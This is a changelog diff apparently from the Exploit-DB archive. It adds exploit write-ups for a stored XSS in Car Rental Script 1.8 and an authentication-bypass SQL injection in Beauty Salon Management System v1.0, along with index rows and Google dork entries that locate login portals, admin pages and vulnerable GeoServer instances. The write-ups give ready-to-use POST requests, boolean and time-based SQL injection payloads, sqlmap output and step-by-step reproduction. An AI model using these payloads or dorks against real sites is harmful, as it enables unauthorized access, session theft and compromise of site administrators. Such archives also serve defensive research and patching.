DB: 2023-07-05

4 changes to exploits/shellcodes/ghdb

Beauty Salon Management System v1.0 - SQLi

Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)

Car Rental Script 1.8 - Stored Cross-site scripting (XSS)

NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

exploits/php/webapps/51567.txt

@@ -0,0 +1,43 @@
+# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
+# Date: 30/07/2023
+# Exploit Author: CraCkEr
+# Vendor: GZ Scripts
+# Vendor Homepage: https://gzscripts.com/
+# Software Link: https://gzscripts.com/car-rental-php-script.html
+# Version: 1.8
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+Release Notes:
+
+Allow Attacker to inject malicious code into website, give ability to steal sensitive
+information, manipulate data, and launch additional attacks.
+
+## Stored XSS
+-----------------------------------------------
+POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1
+
+payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
+-----------------------------------------------
+
+POST parameter 'first_name' is vulnerable to XSS
+POST parameter 'second_name' is vulnerable to XSS
+POST parameter 'phone' is vulnerable to XSS
+POST parameter 'address_1' is vulnerable to XSS
+POST parameter 'country' is vulnerable to XSS
+
+
+## Steps to Reproduce:
+
+1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car
+2. Inject your [XSS Payload] in "First Name"
+3. Inject your [XSS Payload] in "Last Name"
+4. Inject your [XSS Payload] in "Phone"
+5. Inject your [XSS Payload] in "Address Line 1"
+6. Inject your [XSS Payload] in "Country"
+7. Accept with terms & Press [Booking]
+XSS Fired on Local User Browser.
+8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
+XSS Will Fire and Executed on his Browser
+9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
+XSS Will Fire and Executed on his Browser

exploits/php/webapps/51568.txt

@@ -0,0 +1,75 @@
+# Exploit Title: Beauty Salon Management System v1.0 - SQLi
+# Date of found: 04/07/2023
+# Exploit Author: Fatih Nacar
+# Version: V1.0
+# Tested on: Windows 10
+# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>
+# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
+# CWE: CWE-89
+
+Vulnerability Description -
+
+Beauty Salon Management System: V1.0, developed by Campcodes, has been
+found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
+allows an attacker to manipulate login authentication with the SQL queries
+and bypass authentication. The system fails to properly validate
+user-supplied input in the username and password fields during the login
+process, enabling an attacker to inject malicious SQL code. By exploiting
+this vulnerability, an attacker can bypass authentication and gain
+unauthorized access to the system.
+
+Steps to Reproduce -
+
+The following steps outline the exploitation of the SQL Injection
+vulnerability in Beauty Salon Management System V1.0:
+
+1. Open the admin login page by accessing the URL:
+http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
+
+2. In the username and password fields, insert the following SQL Injection
+payload shown inside brackets to bypass authentication for usename
+parameter:
+
+{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
+ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
+In}
+
+3.Execute the SQL Injection payload.
+
+As a result of successful exploitation, the attacker gains unauthorized
+access to the system and is logged in with administrative privileges.
+
+Sqlmap results:
+
+POST parameter 'username' is vulnerable. Do you want to keep testing the
+others (if any)? [y/N] y
+
+sqlmap identified the following injection point(s) with a total of 793
+HTTP(s) requests:
+
+---
+
+Parameter: username (POST)
+
+Type: boolean-based blind
+
+Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+
+Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
+ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
+In
+
+Type: time-based blind
+
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
+rvYF&password=test&login=Sign In
+
+---
+
+[15:58:56] [INFO] the back-end DBMS is MySQL
+
+web application technology: PHP 8.2.4, Apache 2.4.56
+
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

files_exploits.csv

@@ -14628,6 +14628,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,1,CVE-2017-17595,"SQL Injection (SQLi)",,,,
 49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,,2021-02-19,2021-02-19,0,,,,,,
 48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,,2020-06-18,2020-06-18,0,,,,,,
+51568,exploits/php/webapps/51568.txt,"Beauty Salon Management System v1.0 - SQLi",2023-07-04,"Fatih Nacar",webapps,php,,2023-07-04,2023-07-04,0,,,,,,
 51098,exploits/php/webapps/51098.txt,"Beauty-salon v1.0 - Remote Code Execution (RCE)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php,,2008-02-20,,1,OSVDB-42010;CVE-2008-0921,,,,,
 17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php,,2011-04-16,2011-04-16,1,,,,,,
@@ -15119,7 +15120,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43825,exploits/php/webapps/43825.txt,"Burning Board < 2.3.1 - SQL Injection",2015-05-16,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00069;CVE-2005-1642,,,,,http://gulftech.org/advisories/Burning%20Board%20SQL%20Injection/69
 12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,webapps,php,,2010-05-01,,0,,,,,,
 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,,2017-12-14,2017-12-14,1,CVE-2017-17645,,,,,
-51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
+51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-07-04,1,,,,,,
 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2021-09-09,0,,,,,,
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
@@ -15301,6 +15302,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,,2020-11-10,2020-11-10,0,,,,,,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,,2020-12-02,2020-12-02,0,,,,,,
 49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,,2021-02-03,2021-02-03,0,,,,,,
+51567,exploits/php/webapps/51567.txt,"Car Rental Script 1.8 - Stored Cross-site scripting (XSS)",2023-07-04,CraCkEr,webapps,php,,2023-07-04,2023-07-04,0,,,,,,
 43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17637,,,,,
 41595,exploits/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",webapps,php,,2017-03-13,2017-03-13,0,,,,,,
 26878,exploits/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4381;OSVDB-21834,,,,,https://www.securityfocus.com/bid/15939/info
@@ -24310,7 +24312,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php,,2006-09-26,,1,OSVDB-37965;CVE-2006-5102,,,,,
 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,,2004-09-01,2013-01-27,1,CVE-2004-1657;OSVDB-9453,,,,,https://www.securityfocus.com/bid/11086/info
 2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php,,2006-12-20,,1,OSVDB-32400;CVE-2006-6711,,,,,
-51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,0,CVE-2022-3142,,,,,
+51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-07-04,1,CVE-2022-3142,,,,,
 28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php,,2006-09-13,2013-09-28,1,,,,,,https://www.securityfocus.com/bid/20040/info
 27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2051;OSVDB-25265,,,,,https://www.securityfocus.com/bid/17685/info
 37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php,,2012-03-27,2015-05-14,1,OSVDB-80637;CVE-2012-1603,,,,,https://www.securityfocus.com/bid/52728/info

ghdb.xml

@@ -37217,6 +37217,37 @@ Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
   <date>2021-09-27</date>
   <author>Bon Sai</author>
  </entry>
+ <entry>
+  <id>8210</id>
+  <link>https://www.exploit-db.com/ghdb/8210</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>Google dorks</shortDescription>
+  <textualDescription># Google Dork: intext:&quot;/login.php&quot; intitle:&quot;login&quot;
+# Files Containing Juicy Info
+# Date: 04/06/2023
+# Exploit Author: Avadhesh Nishad
+
+
+
+
+
+Avadhesh Nishad
+
+( WEB APPLICATION SECURITY RESEARCHERS )
+
+
+*POC Images Attached with this mail.*
+
+
+[image: Screenshot (4).png]
+[image: Screenshot (5).png]
+</textualDescription>
+  <query>Google dorks</query>
+  <querystring>https://www.google.com/search?q=Google dorks</querystring>
+  <edb></edb>
+  <date>2023-07-04</date>
+  <author>Avadhesh Nishad</author>
+ </entry>
  <entry>
   <id>7836</id>
   <link>https://www.exploit-db.com/ghdb/7836</link>
@@ -90751,6 +90782,21 @@ site:&quot;.atlassian.net&quot; / &quot;service desk/customer/user/login&quot;</
   <date>2021-09-14</date>
   <author>Madan Kumawat</author>
  </entry>
+ <entry>
+  <id>8215</id>
+  <link>https://www.exploit-db.com/ghdb/8215</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>site:.com inurl:/login.aspx</shortDescription>
+  <textualDescription># Google Dork: site:.com inurl:/login.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta</textualDescription>
+  <query>site:.com inurl:/login.aspx</query>
+  <querystring>https://www.google.com/search?q=site:.com inurl:/login.aspx</querystring>
+  <edb></edb>
+  <date>2023-07-04</date>
+  <author>Sachin Gupta</author>
+ </entry>
  <entry>
   <id>7704</id>
   <link>https://www.exploit-db.com/ghdb/7704</link>
@@ -90843,6 +90889,36 @@ Zeel Chavda</textualDescription>
   <date>2015-07-27</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8213</id>
+  <link>https://www.exploit-db.com/ghdb/8213</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>site:.org inurl:/admin.aspx</shortDescription>
+  <textualDescription># Google Dork: site:.org inurl:/admin.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta</textualDescription>
+  <query>site:.org inurl:/admin.aspx</query>
+  <querystring>https://www.google.com/search?q=site:.org inurl:/admin.aspx</querystring>
+  <edb></edb>
+  <date>2023-07-04</date>
+  <author>Sachin Gupta</author>
+ </entry>
+ <entry>
+  <id>8214</id>
+  <link>https://www.exploit-db.com/ghdb/8214</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>site:.org inurl:/login.aspx</shortDescription>
+  <textualDescription># Google Dork: site:.org inurl:/login.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta</textualDescription>
+  <query>site:.org inurl:/login.aspx</query>
+  <querystring>https://www.google.com/search?q=site:.org inurl:/login.aspx</querystring>
+  <edb></edb>
+  <date>2023-07-04</date>
+  <author>Sachin Gupta</author>
+ </entry>
  <entry>
   <id>5368</id>
   <link>https://www.exploit-db.com/ghdb/5368</link>
@@ -91112,6 +91188,36 @@ Iranian cyber sec researcher
   <date>2020-12-01</date>
   <author>Reza Abasi</author>
  </entry>
+ <entry>
+  <id>8212</id>
+  <link>https://www.exploit-db.com/ghdb/8212</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>site:co.in inurl:/admin.aspx</shortDescription>
+  <textualDescription># Google Dork: site:co.in inurl:/admin.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta</textualDescription>
+  <query>site:co.in inurl:/admin.aspx</query>
+  <querystring>https://www.google.com/search?q=site:co.in inurl:/admin.aspx</querystring>
+  <edb></edb>
+  <date>2023-07-04</date>
+  <author>Sachin Gupta</author>
+ </entry>
+ <entry>
+  <id>8211</id>
+  <link>https://www.exploit-db.com/ghdb/8211</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>site:co.in inurl:/login.aspx</shortDescription>
+  <textualDescription># Google Dork: site:co.in inurl:/login.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta</textualDescription>
+  <query>site:co.in inurl:/login.aspx</query>
+  <querystring>https://www.google.com/search?q=site:co.in inurl:/login.aspx</querystring>
+  <edb></edb>
+  <date>2023-07-04</date>
+  <author>Sachin Gupta</author>
+ </entry>
  <entry>
   <id>6444</id>
   <link>https://www.exploit-db.com/ghdb/6444</link>
@@ -114202,6 +114308,21 @@ https://www.exploit-db.com/exploits/50021
   <date>2021-06-25</date>
   <author>Alexandros Pappas</author>
  </entry>
+ <entry>
+  <id>8216</id>
+  <link>https://www.exploit-db.com/ghdb/8216</link>
+  <category>Vulnerable Servers</category>
+  <shortDescription>inurl:&quot;/geoserver/ows?service=wfs&quot;</shortDescription>
+  <textualDescription># Google Dork: inurl:&quot;/geoserver/ows?service=wfs&quot;
+# Vulnerable Servers
+# Date: 04/07/2023
+# Author: Bipin Jitiya</textualDescription>
+  <query>inurl:&quot;/geoserver/ows?service=wfs&quot;</query>
+  <querystring>https://www.google.com/search?q=inurl:&quot;/geoserver/ows?service=wfs&quot;</querystring>
+  <edb></edb>
+  <date>2023-07-04</date>
+  <author>Bipin Jitiya</author>
+ </entry>
  <entry>
   <id>833</id>
   <link>https://www.exploit-db.com/ghdb/833</link>